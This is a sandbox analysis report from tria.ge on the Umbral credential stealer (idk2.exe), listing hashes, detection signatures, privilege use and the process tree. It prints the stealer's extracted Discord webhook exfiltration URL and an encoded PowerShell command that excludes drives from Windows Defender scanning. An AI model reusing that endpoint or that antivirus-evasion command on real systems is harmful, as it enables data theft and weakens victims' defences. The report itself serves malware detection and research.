Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
118s -
max time network
118s -
platform
windows7_x64 -
resource
win7-20240221-en -
resource tags
arch:x64arch:x86image:win7-20240221-enlocale:en-usos:windows7-x64system -
submitted
29/02/2024, 03:55
Static task
static1
Behavioral task
behavioral1
Sample
idk2.exe
Resource
win7-20240221-en
General
-
Target
idk2.exe
-
Size
235KB
-
MD5
ce4b4e4821aba2f7ea9aad57e60f9c3c
-
SHA1
1f01a2d44d06ced9373687ae061f81540fa1c015
-
SHA256
8d612921eca9c96803b1057e860d2d3236869bd3658b01fb7f3402134bd0300c
-
SHA512
727a3cc82dfdaede3fdcab6bd1a52794e90e3a41560345cc82212aaf75a00a09d63c753cf23b5318ad5b58126f29696bc4fbffac4f9ea1eee0af195712dae085
-
SSDEEP
6144:waeJtRSyn/TlQ1VFmqGF3+re5d0KkJ4tWDwp:wNPT/xAVPWUG0KkrD
Malware Config
Extracted
umbral
https://discord.com/api/webhooks/1205352570537775114/0TwopxZF8mZAIjdEowRHAiTqFbB8pjE6dzR2ST_E7pX5YXnZRcMh5QKMfo2QE94dAXKK
Signatures
-
Detect Umbral payload 2 IoCs
resource yara_rule behavioral1/files/0x000b000000012256-3.dat family_umbral behavioral1/memory/1664-7-0x0000000000830000-0x0000000000870000-memory.dmp family_umbral -
Executes dropped EXE 1 IoCs
pid Process 1664 Umbral.exe -
Drops file in Windows directory 1 IoCs
description ioc Process File created C:\Windows\Umbral.exe idk2.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 1004 powershell.exe -
Suspicious use of AdjustPrivilegeToken 42 IoCs
description pid Process Token: SeDebugPrivilege 1004 powershell.exe Token: SeDebugPrivilege 1664 Umbral.exe Token: SeIncreaseQuotaPrivilege 2700 wmic.exe Token: SeSecurityPrivilege 2700 wmic.exe Token: SeTakeOwnershipPrivilege 2700 wmic.exe Token: SeLoadDriverPrivilege 2700 wmic.exe Token: SeSystemProfilePrivilege 2700 wmic.exe Token: SeSystemtimePrivilege 2700 wmic.exe Token: SeProfSingleProcessPrivilege 2700 wmic.exe Token: SeIncBasePriorityPrivilege 2700 wmic.exe Token: SeCreatePagefilePrivilege 2700 wmic.exe Token: SeBackupPrivilege 2700 wmic.exe Token: SeRestorePrivilege 2700 wmic.exe Token: SeShutdownPrivilege 2700 wmic.exe Token: SeDebugPrivilege 2700 wmic.exe Token: SeSystemEnvironmentPrivilege 2700 wmic.exe Token: SeRemoteShutdownPrivilege 2700 wmic.exe Token: SeUndockPrivilege 2700 wmic.exe Token: SeManageVolumePrivilege 2700 wmic.exe Token: 33 2700 wmic.exe Token: 34 2700 wmic.exe Token: 35 2700 wmic.exe Token: SeIncreaseQuotaPrivilege 2700 wmic.exe Token: SeSecurityPrivilege 2700 wmic.exe Token: SeTakeOwnershipPrivilege 2700 wmic.exe Token: SeLoadDriverPrivilege 2700 wmic.exe Token: SeSystemProfilePrivilege 2700 wmic.exe Token: SeSystemtimePrivilege 2700 wmic.exe Token: SeProfSingleProcessPrivilege 2700 wmic.exe Token: SeIncBasePriorityPrivilege 2700 wmic.exe Token: SeCreatePagefilePrivilege 2700 wmic.exe Token: SeBackupPrivilege 2700 wmic.exe Token: SeRestorePrivilege 2700 wmic.exe Token: SeShutdownPrivilege 2700 wmic.exe Token: SeDebugPrivilege 2700 wmic.exe Token: SeSystemEnvironmentPrivilege 2700 wmic.exe Token: SeRemoteShutdownPrivilege 2700 wmic.exe Token: SeUndockPrivilege 2700 wmic.exe Token: SeManageVolumePrivilege 2700 wmic.exe Token: 33 2700 wmic.exe Token: 34 2700 wmic.exe Token: 35 2700 wmic.exe -
Suspicious use of WriteProcessMemory 11 IoCs
description pid Process procid_target PID 1032 wrote to memory of 1004 1032 idk2.exe 28 PID 1032 wrote to memory of 1004 1032 idk2.exe 28 PID 1032 wrote to memory of 1004 1032 idk2.exe 28 PID 1032 wrote to memory of 1004 1032 idk2.exe 28 PID 1032 wrote to memory of 1664 1032 idk2.exe 30 PID 1032 wrote to memory of 1664 1032 idk2.exe 30 PID 1032 wrote to memory of 1664 1032 idk2.exe 30 PID 1032 wrote to memory of 1664 1032 idk2.exe 30 PID 1664 wrote to memory of 2700 1664 Umbral.exe 31 PID 1664 wrote to memory of 2700 1664 Umbral.exe 31 PID 1664 wrote to memory of 2700 1664 Umbral.exe 31
Processes
-
C:\Users\Admin\AppData\Local\Temp\idk2.exe"C:\Users\Admin\AppData\Local\Temp\idk2.exe"1⤵
- Drops file in Windows directory
- Suspicious use of WriteProcessMemory
PID:1032 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -EncodedCommand "PAAjAGQAYwBhACMAPgBBAGQAZAAtAE0AcABQAHIAZQBmAGUAcgBlAG4AYwBlACAAPAAjAHoAbABmACMAPgAgAC0ARQB4AGMAbAB1AHMAaQBvAG4AUABhAHQAaAAgAEAAKAAkAGUAbgB2ADoAVQBzAGUAcgBQAHIAbwBmAGkAbABlACwAJABlAG4AdgA6AFMAeQBzAHQAZQBtAEQAcgBpAHYAZQApACAAPAAjAHYAbQBnACMAPgAgAC0ARgBvAHIAYwBlACAAPAAjAHcAeQBzACMAPgA="2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1004
-
-
C:\Windows\Umbral.exe"C:\Windows\Umbral.exe"2⤵
- Executes dropped EXE
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:1664 -
C:\Windows\System32\Wbem\wmic.exe"wmic.exe" csproduct get uuid3⤵
- Suspicious use of AdjustPrivilegeToken
PID:2700
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
230KB
MD5e57355d016f869b612bb5512bc9929da
SHA18d49a140dbe7ef50a1052bbb90514f84ff211daa
SHA256516a9e91fdd13f05c4a8df291b9d2bb1571d5ce6223b883a6cae345cf0e75643
SHA5124191df273c90a6e950bbae1931abe8d9e735ab9ff947fe0331664dcf8b96fdc50bb3436761d4e5ce190afd8a503ccad0fe2eb211b6af8a63aa6c6ae1bb7aee19